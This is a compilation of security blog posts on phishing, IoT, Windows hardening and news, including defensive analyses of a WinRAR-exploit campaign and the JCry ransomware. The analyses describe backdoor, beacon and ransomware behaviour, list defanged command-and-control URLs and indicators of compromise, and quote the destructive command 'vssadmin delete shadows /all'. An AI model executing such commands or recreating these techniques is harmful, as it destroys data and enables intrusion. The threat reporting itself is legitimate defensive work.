So, how exactly do hackers trick innocent users into handing over their login information? Cybercriminals spread this scam by sending messages through hacked accounts to the user’s followers, stating that they were spotted on a “Nasty List.” These messages will read something like “OMG your actually on here, @TheNastyList_34, your number is 15! its really messed up.” If the recipient visits the profile listed in the message, they will see a link in the profile description. An example of one URL that has been listed in these scam profiles is nastylist-instatop50[.]me. The user is tricked into believing that this link will supposedly allow them to see why they are on this list. This link brings up what appears to be a legitimate Instagram login page. When the victim enters their credentials on the fake login page, the cybercriminals behind this scheme will be able to take over the account and use it to further promote the scam.

Images courtesy of Bleeping Computer.
Images courtesy of Bleeping Computer.

Fortunately, there are a number of steps Instagram users can take to ensure that they don’t fall victim to this trap. Check out the following tips:

  • Be skeptical of messages from unknown users. If you receive a message from someone you don’t know, it’s best to ignore the message altogether or block the user. Additionally, if you think a friend’s social media account has been compromised, look out for spelling mistakes and grammatical errors in their message, which are common in these scams.
  • Exercise caution when inspecting links sent to your messages. Always inspect a URL before you click on it. In the case of this scam, the URL that appears with the fake login page is clearly incorrect, as it ends in a [.]me.
  • Reset your password. If your account was hacked by ‘The Nasty List’ but you still have access to your account, reset your password to regain control of your account.

And, as usual, to stay updated on all of the latest consumer and mobile security threats, follow @McAfee_Home  on Twitter, listen to our podcast Hackable?, and ‘Like’ us on Facebook.

The post The “Nasty List” Phishing Scam Is out to Steal Your Instagram Login appeared first on McAfee Blogs.

From Internet to Internet of Things

Thirty years ago, Tim Berners-Lee set out to accomplish an ambitious idea – the World Wide Web. While most of us take this invention for granted, we have the internet to thank for the technological advances that make up today’s smart home. From smart plugs to voice assistants – these connected devices have changed the modern consumer digital lifestyle dramatically. In 2019, the Internet of Things dominates the technological realm we have grown accustomed to – which makes us wonder, where do we go from here? Below, we take a closer look at where IoT began and where it is headed.

A Connected Evolution

Our connected world started to blossom with our first form of digital communication in the late 1800s –– Morse code. From there, technological advancements like the telephone, radio, and satellites made the world a smaller place. By the time the 1970s came about, email became possible through the creation of the internet. Soon enough the internet spread like wildfire, and in the 1990s we got the invention of the World Wide Web, which revolutionized the way people lived around the world. Little did Berners-Lee know that his invention would be used decades, probably even centuries, later to enable the devices that contribute to our connected lives.

Just ten years ago, there were less than one billion IoT devices in use around the world. In the year 2019, that number has been projected to skyrocket to over eight billion throughout the course of this year. In fact, it is predicted that by 2025, there will be almost twenty-two billion IoT devices in use throughout the world. Locks, doorbells, thermostats and other everyday items are becoming “smart,” while security for these devices is lacking quite significantly. With these devices creating more access points throughout our smart homes, it is comparable to leaving a backdoor unlocked for intruders. Without proper security in place, these devices, and by extension our smart homes, are vulnerable to cyberattacks.

Moving Forward with Security Top of Mind

If we’ve learned one thing from this technological evolution, it’s that we aren’t moving backward anytime soon. Society will continue to push the boundaries of what is possible – like taking the first a picture of a black hole. However, in conjunction with these advancements, to steer in the right direction, we have to prioritize security, as well as ease of use. For these reasons, it’s vital to have a security partner that you can trust, that will continue to grow to not only fit evolving needs, but evolving technologies, too. At McAfee, we make IoT device security a priority. We believe that when security is built in from the start, user data is more secure. Therefore, we call on manufacturers, users, and organizations to all equally do their part to safeguard connected devices and protect precious data. From there, we can all enjoy these technological advancements in a secure and stress-free way.

Interested in learning more about IoT and mobile security trends and information? Follow @McAfee_Home on Twitter, and ‘Like” us on Facebook.

The post From Internet to Internet of Things appeared first on McAfee Blogs.

DevSecOps: Fast development without sacrificing safety

DevOps has been a boon to companies looking to shorten the systems development cycle, pushing software developers and IT operations to work together and help their enterprises fulfil their business objectives. But while DevOps has been embraced relatively quickly, the same cannot be said for adding security into the mix, even though many software devs and IT and security professionals agree that it would be welcome and the effects of this merger on app security … More

The post DevSecOps: Fast development without sacrificing safety appeared first on Help Net Security.

Building a modern data registry: Go beyond data classification

For organizations, understanding what data they store and analyze is gaining increasing urgency due to new privacy regulations, from the Global Data Privacy Regulation (GDPR) to the California Consumer Privacy Act (CCPA) and Brazil’s General Data Protection Law (LGPD). But these regulations are not the only reason organizations are focused on privacy. Security imperatives and pressure to extract more value from the information they store has also put pressure on companies to get data privacy … More

The post Building a modern data registry: Go beyond data classification appeared first on Help Net Security.

Microsoft 365 security: Protecting users from an ever-evolving threat landscape

In this age of frequent security and data breaches, the statement “We take our customers’ privacy and security very seriously” has been heard from breached companies so often as to become a point of mockery, anger and frustration. But when Rob Lefferts, CVP of Microsoft 365 Security and Compliance, tells me the same thing (and the statement is not in response to a security breach), I believe him. If they didn’t, this cloud-based SaaS offering … More

The post Microsoft 365 security: Protecting users from an ever-evolving threat landscape appeared first on Help Net Security.

A "Department of Cybersecurity"

Presidential candidate John Delaney has announced a plan to create a Department of Cybersecurity.

I have long been in favor of a new federal agency to deal with Internet -- and especially Internet of Things -- security. The devil is in the details, of course, and it's really easy to get this wrong. In Click Here to Kill Everybody, I outline a strawman proposal; I call it the "National Cyber Office" and model it on the Office of the Director of National Intelligence. But regardless of what you think of this idea, I'm glad that at least someone is talking about it.

Slashdot thread. News story.

EDITED TO ADD: Yes, this post is perilously close to presidential politics. Any comment that opines on the qualifications of this, or any other, presidential candidate will be deleted.

Why Cyber Security is Key to Enterprise Risk Management for all Organizations

Large organizations have always focused on managing risk, but the technological breakthroughs that have enhanced our world in countless ways have also transformed how leading executives engage in enterprise risk management (ERM). The pervasive and ever-expanding threat of cyber crime means that comprehensive strategies for cyber security are now absolutely essential for all organizations. After […]… Read More

The post Why Cyber Security is Key to Enterprise Risk Management for all Organizations appeared first on The State of Security.

The Path to Cyber Resilience: Takeaways from the Scalar 2019 Security Study

The annual Scalar Security Study, published in February 2019 and conducted by IDC Canada, identified a new normal across the threat landscape: cybersecurity incidents, be it exfiltration, infiltration or denial of service, occur on a regular basis. Focused on small, midsize and large organizations in Canada, the study confirms that intrusions are inevitable and moreover […]… Read More

The post The Path to Cyber Resilience: Takeaways from the Scalar 2019 Security Study appeared first on The State of Security.

This Week in Security News: 5G Security and Tax Scams

Welcome to our weekly roundup, where we share what you need to know about the cybersecurity news and events that happened over the past few days. This week, learn about cybersecurity and data concerns in 5G. Also, learn about cybercriminal threats during tax season.

Read on:

Securing Enterprises for 5G Connectivity

For the advantages of 5G to be unlocked, ample preparation and planning are necessary. Looking at the changes 5G networks might bring about on an enterprise and its security is a good place to start. 

 

Trend Micro Extends Security Offerings

Trend Micro has announced enhancements to its Deep Security and Cloud App Security products designed to extend protection to virtual machines on the Google Cloud Platform, Kubernetes platform protection, container image scanning integration with the Google Kubernetes Engine (GKE) and Gmail on the G Suite.

What You Need To Know About Tax Scams

While many taxpayers are rushing to file their returns, cybercriminals use the tax season to deceive people into unwittingly handing out credentials, money, and personally identifiable information. 

Hackers Go For Smaller Amounts Three Years After $100 Million Heist

In 2018, attempted fraudulent transactions ranged from $250,000 and $2 million, down from tens of millions of dollars in the previous two years, interbank messaging system Swift said in a report.

Mirai Variant Spotted Using Multiple Exploits, Targets Various Routers

Trend Micro researchers uncovered a new variant of the notorious Mirai malware that uses multiple exploits to target various routers and internet-of-things devices. 

Yahoo Tries to Settle 3-Billion-Account Data Breach with $118 Million Payout

Yahoo and plaintiffs, in a case over a data breach affecting three billion user accounts, have agreed to and filed a settlement that would require Yahoo to pay $117.5 million.

Ransomware Attack Hinders Michigan County Operations

On April 2, Michigan County reported a ransomware attack on their network, which was more severe than originally thought. The county has not been able to resume normal operations due to the attack. 

‘MuddyWater’ APT Spotted Attacking Android

A cyber espionage group believed to be out of Iran and known for targeting telecommunications providers and government bodies in the Middle East has added to its arsenal malware for targeting Android devices. 

Phishing Attack Uses Browser Extension Tool SingleFile to Obfuscate Malicious Log-in Pages

Phishing is a permanent staple of a cybercrime due to its effectiveness. The concept behind phishing itself is simple but the strategies used by cybercriminals have become increasingly sophisticated.  

Adobe Fixes 24 Critical Flaws in Acrobat Reader, Flash, Shockwave Player

During its regularly scheduled April security update, Adobe overall issued 43 patches, including ones for 24 critical vulnerabilities in eight of its products.

What security techniques or technologies is your enterprise using to prepare for new advancements like 5G? Share your thoughts in the comments below or follow me on Twitter to continue the conversation: @JonLClay.

The post This Week in Security News: 5G Security and Tax Scams appeared first on .

Introducing the security configuration framework: A prioritized guide to hardening Windows 10

In the past, we left defining the security configuration for Windows 10 as a task for every customer to sort out. As a result, we saw as many different configurations as we saw customers. Standardization has many advantages, so we developed a security configuration framework to help simplify security configuration while still allowing enough flexibility to allow you to balance security, productivity, and user experience. We are defining discrete prescriptive Windows 10 security configurations (levels 5 through 1) to meet many of the common device scenarios we see today in the enterprise.

While building out this framework, we thought: what are key considerations for a security professional in today’s world?

Priority

What do I do next?

This is the question security professionals must constantly ask themselves. Nearly every security architect I’ve met with has a pile of security assessments on their desk (and a list of vendors eager to give them more); their challenge is never identifying something that they can do, but identifying which is the next most important thing to do from the massive list they have already identified!

I also get questions from customers who are just now planning their Windows 10 deployment and are hoping to configure as many security features as possible – but since they haven’t deployed yet, they don’t have guidance from the Microsoft Defender ATP Secure Score yet (we’ll discuss that in a minute) – how can they prioritize the features to initially enable? Achieving early wins is a key aspect to driving business value from the investment in this deployment.

Clearly, a key aspect for a security configuration framework is to help drive a smart set of priorities.

Comparison

Understanding where you lie in a continuum of security is also valuable. You see, there is no perfect score in security; everyone could always get better. What we really need to drive is a cycle of continuous improvement. But without an absolute target to pursue, how do you get a sense of how good is good enough? Looking at the posture of others is helpful. Being the best in security is of course aspirational, but being the worst is something you must avoid! There are other unintended consequences of being the “best” to be mindful of as well. Security configuration may be at odds with productivity or user experience; imagine if you worked for a software company and couldn’t test your own code because it wasn’t on your organizational safe programs list yet?

I want to be careful not to overemphasize the competitive aspect here. You don’t want to go deliberately misleading your peers in the industry – in fact, one thing I’m deeply passionate about is improving cooperation among the people on the side of good. Why is this so important? Because bad people have, through innovations of commerce on the dark web, devised a system of cooperation that is shockingly effective. In an environment of inherent distrust (think about it – literally everyone involved is, by definition, untrustworthy), they work together. We’re at a significant disadvantage if we don’t learn to cooperate at least as well!

Secure score in Microsoft Defender ATP

In Microsoft Defender ATP, the secure score is the path to achieving this. Through the top recommendations, we suggest a prioritized list for securing your devices, with a relative ranking of the overall impact to your security posture. We are also exploring ways to provide useful comparisons using this framework.

Secure score in Microsoft Defender ATP

Secure score represents our best recommendations for securing your endpoint devices (among other things). It’s context-aware, driven by your existing configuration and the threats impacting your environment.

But…

One of the questions we’ve been asking is – what should you do if you have not yet purchased or deployed Microsoft Defender ATP in order to compute your secure score? What if you haven’t even deployed Windows 10? What if you don’t know exactly how to configure a given set of features? We thought we should supplement secure score to help people in all these scenarios with the security configuration framework.

The security configuration framework

The security configuration framework is designed to assist with exactly this scenario. We sat down and asked ourselves this question: if we didn’t know anything at all about your environment, what security policies and security controls would we suggest you implement first? We worked with a select group of pilot customers, experts from Microsoft’s engineering team, and the Microsoft sales field to develop this guidance.

Rather than making an itemized list, we grouped recommendations into coherent and discrete groups, which makes it easier for you to see where you stand in terms of your defensive posture. In this initial draft, we have defined 5 discrete levels of security configuration. Mimicking the DEFCON levels used to determine alert state by the United States Armed Forces, lower numbers indicate a higher degree of security hardening:

Security configuration framework levels 5 through 1

  1. Enterprise security – We recommend this configuration as the minimum-security configuration for an enterprise device. Recommendations for this security configuration level are generally straightforward and are designed to be deployable within 30 days.
  2. Enterprise high security – We recommend this configuration for devices where users access sensitive or confidential information. Some of the controls may have an impact to app compatibility, and therefore will often go through an audit-configure-enforce workflow. Recommendations for this level are generally accessible to most organizations and are designed to be deployable within 90 days.
  3. Enterprise VIP security – We recommend this configuration for devices run by an organization with a larger or more sophisticated security team, or for specific users or groups who are at uniquely high risk (for example, one organization identified users who handle data whose theft would directly and seriously impact their stock price). An organization likely to be targeted by well-funded and sophisticated adversaries should aspire to this configuration. Recommendations for this security configuration level can be complex (for example, removing local admin rights for some organizations can be a long project in and of itself) and can often go beyond 90 days.
  4. DevOps workstation – We recommend this configuration for developers and testers, who are an attractive target both for supply chain attacks and credential theft attacks that attempt to gain access to servers and systems containing high-value data or where critical business functions could be disrupted. We are still developing this guidance, and will make another announcement as soon as it is ready.
  5. Administrator workstation – Administrators (particularly of identity or security systems) face the highest risk, through data theft, data alteration, or service disruption. We are still developing this guidance, and will make another announcement as soon as it is ready.

How do you choose the configuration that’s best for your organization? If you’re an organization that’s already looking to Windows security baselines to provide advanced levels of security (now also available in preview for Intune), then level 3 incorporates these baselines as the foundation. If you’re earlier in your journey, then you should find level 5 a great starting point and can then balance the enhanced security of higher levels against your application readiness and risk tolerance.

We are releasing this draft version to gather additional feedback from organizations looking to organize their device security hardening program. You can find the draft security configuration framework documentation and provide us feedback at https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-security-configuration-framework/windows-security-configuration-framework.

We are eager to gather feedback on how we could make this guidance more useful, and if there are security controls and configurations you feel may be misplaced (or missing)!

 

The post Introducing the security configuration framework: A prioritized guide to hardening Windows 10 appeared first on Microsoft Security.

How to Build an Effective ICS Security Program

Industrial control systems (ICS) security is an important concern for businesses in today’s world. Kaspersky Lab is well aware of this fact. It observed as much in its “The State of Industrial Cybersecurity 2018” report when three-quarters of respondents affirmed ICS security to be a top concern for their organization. But the Russian security firm […]… Read More

The post How to Build an Effective ICS Security Program appeared first on The State of Security.

Analysis of a targeted attack exploiting the WinRAR CVE-2018-20250 vulnerability

In early March, we discovered a cyberattack that used an exploit for CVE-2018-20250, an old WinRAR vulnerability disclosed just several weeks prior, and targeted organizations in the satellite and communications industry. A complex attack chain incorporating multiple code execution techniques attempted to run a fileless PowerShell backdoor that could allow an adversary to take full control of compromised machines.

The WinRAR vulnerability was discovered by Check Point researchers, who demonstrated in a February 20 blog post that a specially crafted ACE file (a type of compressed file) could allow remote code execution. Attackers quickly took advantage of the vulnerability in attacks, including a targeted attack that 360 Total Security researchers discovered just two days after disclosure. The exploit has since been observed in multiple malware attacks.

The use of ACE files is not uncommon in malware campaigns. A combination of machine learning, advanced heuristics, behavior-based detections, and detonation enables Office 365 Advanced Threat Protection (ATP) to regularly detect and block a variety of threats that are packed in ACE files, including common malware like Fareit, Agent Tesla, NanoCore, LokiBot and some ransomware families.

The same capabilities in Office 365 ATP detected malicious ACE files carrying the CVE-2018-20250 exploit. We spotted one of these ACE files in the sophisticated targeted attack that we describe in this blog and that stood out because of unusual, interesting techniques. Notably, the attack used techniques that are similar to campaigns carried out by the activity group known as MuddyWater, as observed by other security vendors like Trend Micro.

Attack chain diagram

Figure 1. Attack chain that delivered the CVE-2018-20250 exploit

Attack chain overview

A spear-phishing email purporting to be from the Ministry of Foreign Affairs (MFA) of the Islamic Republic of Afghanistan was sent to very specific targets and asked for “resources, telecommunication services and satellite maps”. The email came with a Word document attachment.

Spear phishing email

Figure 2. Spear phishing email containing lure Word Document

When opened, the document asks the recipient to download another document from a now-inactive OneDrive link. While the URL was down during our analysis, we still reported the case to the OneDrive team.

The use of a document with just a link—no malicious macro or embedded object—was likely meant to evade conventional email security protection. This didn’t work against Office 365 ATP, which has the capability to scan emails and Office documents for URLs and analyze links for malicious behavior.

Figure 3. Word document lure containing OneDrive link

Clicking the link downloads an archive file containing a second Word document, which has malicious macro. Microsoft Word opens the document with security warning. Enabling the macro starts a series of malicious actions that leads to the download of the malware payload.

Screenshot of document with malicious macro

Figure 4. Downloaded document with malicious macro

Interestingly, the document has a “Next Page” button. Clicking that button displays a fake message signifying that a certain DLL file is missing, and that the computer needs to restart. This is a social engineering technique that ensures the computer is restarted, which is needed for the payload to run. (More on this later.)

Document with malicious macro and dialog box

Figure 5. Fake message instructing user to restart the computer

Meanwhile, with the macro enabled, the malicious code performs the following in the background:

  • Extract and decode a data blob from TextBox form and drop it as C:\Windows\Temp\id.png
  • Create a malicious Visual Basic Script (VBScript) and drop it as C:\Windows\Temp\temp.vbs
  • Add persistence by creating a COM object and adding autorun registry key to launch the created shell object
  • Launch temp.vbs, which is a wrapper for the malicious PowerShell command that decodes the id.png file, which results in the second-stage PowerShell script that is highly obfuscated and contains multi-layered encryption (this PowerShell script is similar to a script that has been used in past MuddyWater campaigns)

The second-stage PowerShell script collects system information, generates unique computer ID, and sends these to remote location. It acts as a backdoor and can accept commands, including:

  • Download arbitrary file
  • Run command using cmd.exe
  • Decode a base64-encoded command and run it using PowerShell

The PowerShell script’s ability to accept commands and download programs provided a way for a remote attacker to deliver the malicious ACE file containing CVE-2018-20250 exploit. When triggered, the exploit then drops the payload dropbox.exe.
The next sections discuss in detail the key components of this attack chain.

Malicious macro

The highly obfuscated malicious macro code used in this attack has a unique way of running malicious code by chaining several programs. It first extracts an encoded data taken from UserForm.TextBox, before decoding and saving it as C:\Windows\Temp\id.png. This file contains an encoded PowerShell command that is executed later by the first-stage PowerShell script.

Obfuscated macro code

Figure 6. Obfuscated macro code

The malicious macro code then creates an Excel.Application object to write the VBScript code.

VBScript code

Figure 7. VBScript code created by the malicious macro

It then runs wscript.exe to launch the PowerShell script at runtime. The PowerShell script itself does not touch the disc, making it a fileless component of the attack chain. Living-off-the-land, the technique of using resources that are already available on the system (e.g., wscript.exe) to run malicious code directly in memory, is another way that this attack tries to evade detection.

PowerShell

The first-stage PowerShell script contains multiple layers of obfuscation. When run, it decodes the file id.png to produce another PowerShell script that’s responsible for the rest of the actions.

Obfuscated first-stage PowerShell

Figure 8. Obfuscated first-stage PowerShell code

De-obfuscated first stage malware

Figure 9. De-obfuscated first-stage PowerShell script

The decrypted PowerShell script is also highly obfuscated. Fully de-obfuscating the malicious script requires over 40 layers of script blocks.

The second-stage PowerShell script collects system information, such as operating system, OS architecture, username, domain name, disk information, enabled-only IP addresses, and gateway IP address. It computes the MD5 hash of collected system information. The computed hash is used as the BotID (some researchers also refer to this as SYSID).

It then concatenates the hash and system information in a string that looks like the following:

<BotID>**<OS>|Disk information**<IP Address List>**<OS Architecture>**<Hostname>**<Domain>**<Username>**<Gateway IP>

For example:

6e6bdbd3d8b102305f016b06e995a384**Microsoft Windows 10 Enterprise|C:\WINDOWS|\Device\Harddisk0\Partition3**192[.]168[.]61[.]1-192[.]168[.]32[.]1-157[.]59[.]24[.]113**64-bit**<Hostname>**<Domain>**<Username>**131[.]107[.]160[.]113

It then encodes each character of the collected system information in decimal value by applying simple custom algorithm with hardcoded key (public key): 959,713. The result is formatted as XML-like data:

{“data”:”665 545 145 145 222 545 222 145 73 367 665 438 438 438 598 616 145 518 616 566 438 [REDACTED] 616 73 145 145 665 518 365 438 316 665 513 513 432 261 181 344}

It sends the encoded data to a hardcoded remote command-and-control (C&C), likely to check and register the infected computer: hxxp://162[.]223[.]89[.]53/oa/.

It continuously waits until the remote attacker sends back “done”. Then, it sends an HTTP request to the same C&C address passing the BotID, likely to wait for command: hxxp://162[.]223[.]89[.]53/oc/api/?t=<BOTID>.

It can accept command to download and execute command and sends back the output, encoded in Base64 format, to the remote C2 server using HTTP POST: hxxp://162[.]223[.]89[.]53/or/?t=<BOTID>.

CVE-2018-20250 exploit

In their analysis of the CVE-2018-20250 vulnerability, Check Point researchers found that when parsing ACE files, WinRAR used an old DLL named unacev2.dll that was vulnerable to directory traversal.

Malicious ACE files that carry the CVE-2018-20250 exploit can be spotted through:

  • Directory traversal string – The validation from Unacev2.dll for the destination path when extracting ACE is not enough. If attacker can craft relative path that can bypass the checks in place, it may lead to extraction of the embedded payload to the specified location.
  • Drop zone – In-the-wild samples commonly use the Startup folder, but it’s also possible to drop the file to known or pre-determined SMB shared folders.
  • Payload – The malicious payload, as in this attack, is commonly an .exe file, but in-the-wild samples and other ACE files that we’ve seen use other malicious scripts like VBScript executable.

ACE file with CVE-2018-20250 exploit

Figure 10. ACE file with CVE-2018-20250 exploit

The ACE file contains three JPEG files that may look related to the email and Word document lures. When the user attempts to extract any of them, the exploit triggers and drops the payload, dropbox.exe, to the Startup folder.

Contents of the malicious ACE file

Figure 11. Contents of the malicious ACE file

Going back to the fake error message about a missing DLL and asking the user to restart the computer: The CVE-2018-20250 vulnerability only allows file write to specified folder but has no capability to run the file immediately. Since the payload was dropped in the Startup folder, it is launched when the computer restarts.

The payload dropbox.exe performs the same actions as the malicious macro component, which helps ensure that the PowerShell backdoor is running. The PowerShell backdoor could allow a remote attacker to take full control of the compromised machine and make it a launchpad for more malicious actions. Exposing and stopping the attacks at the early stages is critical in preventing additional, typically more damaging impact of undetected malware implants.

Stopping attacks at the entry point with Office 365 ATP

The targeted attack we discussed in this blog and other attacks that use the CVE-2018-20250 exploit show how quickly attackers can take advantage of known vulnerabilities. Attackers are always in search of new vectors to reach more victims. In this attack, they also used some sophisticated code injection techniques. Protections against cyberattacks should be advanced, real-time, and comprehensive.

The URL detonation capabilities in Office 365 ATP was instrumental in detecting and blocking the malicious behaviors across the multiple stages of this sophisticated attack, protecting customers from potentially damaging outcomes. URL detonation, coupled with heuristics, behavior-based detections, and machine learning, allow Office 365 ATP to protect customers not only from targeted attacks, but also well-crafted spear phishing attacks—in real time.

Unified protection across multiple attack vectors with Microsoft Threat Protection

These advanced defenses from Office 365 ATP are shared with other services in Microsoft Threat Protection, which provides seamless, integrated, and comprehensive protection against multiple attack vectors. Through signal-sharing, Microsoft threat Protection orchestrates threat remediation.

For endpoints that are not protected by Office 365 ATP, Microsoft Defender ATP detects the attacker techniques used in this targeted attack. Microsoft Defender ATP is a unified endpoint protection platform for attack surface reduction, next generation protection, endpoint detection & response (EDR), auto investigation & remediation, as well as recently announced managed threat hunting and threat & vulnerability management.

Microsoft Defender ATP uses machine learning, behavior monitoring, and heuristics to detect sophisticated threats. Its industry-leading optics, integration with Office 365 ATP and other Microsoft Threat Protection services, and use of AMSI give it unique capabilities to detect attacker techniques, including the exploit, obfuscation, detection evasion, and fileless techniques observed in this attack.

The attacks that immediately exploited the WinRAR vulnerability demonstrate the importance of threat & vulnerability management in reducing organizational risk. Even if your organization was not affected by this attack against specific organizations in the satellite and communications industry, there are other malware campaigns that used the exploits.

Microsoft Defender ATP’s threat & vulnerability management capability uses a risk-based approach to the discovery, prioritization, and remediation of endpoint vulnerabilities. As a component of a unified endpoint protection platform, threat & hunting vulnerability management in Microsoft Defender ATP provides these unique benefits:

  • Real-time correlation of EDR insights with info on endpoint vulnerabilities
  • Invaluable endpoint vulnerability context for incident investigations
  • Built-in remediation processes through Microsoft Intune and Microsoft System Center Configuration Manager

Threat and Vulnerability Management

Figure 12. Sample Threat & Vulnerability Management dashboard showing WinRAR vulnerabilities on managed endpoints

The complex attack chain that incorporated sophisticated techniques observed in this targeted attack highlights the benefits of a comprehensive protection enriched by telemetry collected across the entire attack chain. Microsoft Threat Protection continues to evolve to provide integrated threat protection solution for the modern workplace.

 

Rex Plantado
Office 365 ATP Research Team

 

Indicators of compromise

Files (SHA-256):

  • 68133eb271d442216e66a8267728ab38bf143627aa5026a4a6d07bb616b3d9fd (Original email attachment) – detected as Trojan:O97M/Maudon.A
  • ef3617a68208f047ccae2d169b8208aa87df9a4b8959e529577fe11c2e0d08c3 (Document hosted in OneDrive link) – detected as Trojan:O97M/Maudon.A
  • 4cb0b2d9a4275d7e7f532f52c1b6ba2bd228a7b50735b0a644d2ecae96263352 (ACE file with CVE-2018-20250 exploit) – detected as Exploit:Win32/CVE-2018-20250
  • 6f78748f5b2902c05e88c1d2e45de8e7c635512a5f25d25217766554534277fe (dropbox.exe (Win64 Payload)) – detected as Trojan:Win32/Maudon.A
  • c0c22e689e1e9fa11cbf8718405b20ce57c1d7c85d8e6e45c617e2b095b01b15 (Encoded id.png) – detected as Trojan:PowerShell/Maudon.A
  • 0089736ee162095ac2e4e66de6468dbb7824fe73996bbea48a3bb85f7fdd53e4 (temp.vbs) – detected as ThreatRelated
  • 1c25286b8dea0ebe4e8fca0181c474ff47cf822330ef3613a7d599c12b37ff5f (PowerShell script decrypted from id.png) – detected as Trojan:PowerShell/Maudon.A
  • 144b3aa998cf9f30d6698bebe68a1248ca36dc5be534b1dedee471ada7302971 (Decrypted PowerShell) – detected as Trojan:PowerShell/Maudon.A

URLs:

  • hxxps://1drv[.]ms/u/s!AgvJCoYH9skpgUNf3Y3bfhSyFQao
  • hxxp://162[.]223[.]89[.]53/oa/
  • hxxp://162[.]223[.]89[.]53/oc/api/?t=<BOTID>
  • hxxp://162[.]223[.]89[.]53/or/?t=<BOTID>

 

The post Analysis of a targeted attack exploiting the WinRAR CVE-2018-20250 vulnerability appeared first on Microsoft Security.

What’s in Your IoT Cybersecurity Kit?

Did you know the average internet-enabled household contains more than ten connected devices? With IoT devices proliferating almost every aspect of our everyday lives, it’s no wonder IoT-based attacks are becoming smarter and more widespread than ever before. From DDoS to home network exposures, it appears cybercriminals have set their sights on the digital dependence inside the smart home — and users must be prepared.

A smart home in today’s world is no longer a wave of the future, but rather just a sign of the times we live in. You would be hard pressed to find a home that didn’t contain some form of smart device. From digital assistants to smart plugs, with more endpoints comes more avenues bad actors can use to access home networks. As recently as 2018, users saw virtual assistants, smart TVs, and even smart plugs appear secure, but under the surface have security flaws that could facilitate home network exposures by bad actors in the future. Whereas some IoT devices were actually used to conduct botnet attacks, like an IoT thermometer and home Wi-Fi routers.

While federal agencies, like the FBI, and IoT device manufacturers are stepping up to do their part to combat IoT-based cyberattacks, there are still precautions users should take to ensure their smart home and family remain secure. Consider this your IoT cybersecurity kit to keep unwelcome visitors out of your home network.

  • When purchasing an IoT device, make security priority #1. Before your next purchase, conduct due diligence. Prioritize devices that have been on the market for an extended period of time, have a trusted name brand, and/or have a lot of online reviews. By following this vetting protocol, the chances are that the device’s security standards will be higher.
  • Keep your software up-to-date on all devices. To protect against potential vulnerabilities, manufacturers release software updates often. Set your device to auto-update, if possible, so you always have the latest software. This includes the apps you use to control the device.
  • Change factory settings immediately. Once you bring a new device into your home, change the default password to something difficult to guess. Cybercriminals often can find the default settings online and can use them to access your devices. If the device has advanced capabilities, use them.
  • Secure your home network. It’s important to think about security as integrated, not disconnected. Not all IoT devices stay in the home. Many are mobile but reconnect to home networks once they are back in the vicinity of the router. Protect your network of connected devices no matter where they go. Consider investing in advanced internet router that has built-in protection that can secure and monitor any device that connects to your home network.
  • Use comprehensive security software. Vulnerabilities and threats emerge and evolve every day. Protect your network of connected devices no matter where you are with a tool like McAfee Total Protection.

Interested in learning more about IoT and mobile security trends and information? Follow @McAfee_Home on Twitter, and ‘Like” us on Facebook.

The post What’s in Your IoT Cybersecurity Kit? appeared first on McAfee Blogs.

JCry – A Ransomware written in Golang!

Estimated reading time: 4 minutes

For several months, QH Labs has been observing an upswing in ransomware activity. We found a new ransomware which is written in Go lang. Malware authors are finding it easy to write ransomware in Go lang rather than traditional programming languages.

Infection of Jcry ransomware starts with a compromised website.

As shown in the above image, malware author tries to impersonate users by pretending to be an update of Adobe flash player and download malware on the user’s machine. Fig 1. contains a part of javascript hosted on the compromised domain, which downloads a malicious file from the given URL. Whenever an impersonated user clicks on the Update button and executes a malicious file with the intention of updating the flash player, malware starts its execution.

Fig 1 : Part of malicious script.

Flow of Execution:

Technical Analysis:

Downloaded malware (flashplayer_install.exe) is Self-extracting archive. On execution, it will extract the below mentioned components in “Startup” directory to create its persistence.

Components:

  1. msg.vbs
  2. Enc.exe
  3. Dec.exe

Fig 2 : Extracted components and SFX instructions.

As mentioned in the above figure malware extract components and starts msg.vbs along with enc.exe(Encryptor)

msg.vbs:

This file is used to impersonate the user that, the system tried to update adobe flash player but access is denied for the user.

Fig 3 : Message shown by msg.vbs

Enc.exe (Encryptor):

This executable is responsible for file encryption and it is written in Go language.

Fig 4 : Go Build ID and library strings of Go Lang found in file.

On execution, it firstly checks for the existence of “personalKey.txt” file in the current directory, to determine that system is already infected or not. If the file exists then malware considers that the system is already infected and it terminates itself. As well as it deletes msg.vbs and Enc.exe with the help of decryptor file. During encryption, it uses the combination of AES and RSA algorithm. File encryption is performed using AES 128 bit algorithm with 16-byte initialization Vector in CBC mode. Hardcoded RSA public key is found in the enc.exe file which is later used to encrypt AES key.

Fig 5 : RSA PUBLIC KEY

 

Fig 6: Acquire Context for Crypto operations.

It encrypts the below listed 138 extension files.

“3dm, 3ds, 3g2, 3gp, 7z, ai, aif, apk, app, asf, asp, avi, b, bak, bin, bmp, c, cbr, cer, cfg, cfm, cgi, cpp, crx, cs, csr, css, csv, cue, dat, db, dbf, dcr, dds, deb, dem, der, dmg, dmp, doc, dtd, dwg, dxf, eps, fla, flv, fnt, fon, gam, ged, gif, gpx, gz, h, hqx, htm, ics, iff, iso, jar, jpg, js, jsp, key, kml, kmz, log, lua, m, m3u, m4a, m4v, max, mdb, mdf, mid, mim, mov, mp3, mp4, mpa, mpg, msg, msi, nes, obj, odt, otf, pct, pdb, pdf, php, pkg, pl, png, pps, ppt, ps, psd, py, rar, rm, rom, rpm, rss, rtf, sav, sdf, sh, sln, sql, srt, svg, swf, tar, tex, tga, thm, tif, tmp, ttf, txt, uue, vb, vcd, vcf, vob, wav, wma, wmv, wpd, wps, wsf, xlr, xls, xml, yuv, zip”

To speed up the encryption, it encrypts only 1MB data for files of size more than 1 MB. After successful file encryption it appends “.jcry” extension to the filename.

Fig 7:Encrypted files with jcry Extension.

After encryption of files, it deletes all shadow copies with the help of the below command.

                                                                  “vssadmin delete shadows /all”

and launch Dec.exe using Powershell command.

Fig 8: Vssadmin and PowerShell execution.

Dec.exe:

On execution of Dec.exe firstly it terminates and deletes enc.exe. Dec.exe is console application which asks the decryption key (RSA private key). After entering valid key it may decrypt encrypted files.

Fig 9 : Dec.exe.

It also drops ransom note on desktop location. To recover encrypted files it demands for 500$ as ransom and provides onion link (hxxp://kpx5wgcda7ezqjty.onion) where infected user will get private key after payment.

Fig 10: Ransom Note.

 

IOCs:

flashplayer_install.exe: c86c75804435efc380d7fc436e344898
Enc.exe : 5B640BE895C03F0D7F4E8AB7A1D82947
Dec.exe : 6B4ED5D3FDFEFA2A14635C177EA2C30D
Recovery Link: hxxp://kpx5wgcda7ezqjty.onion
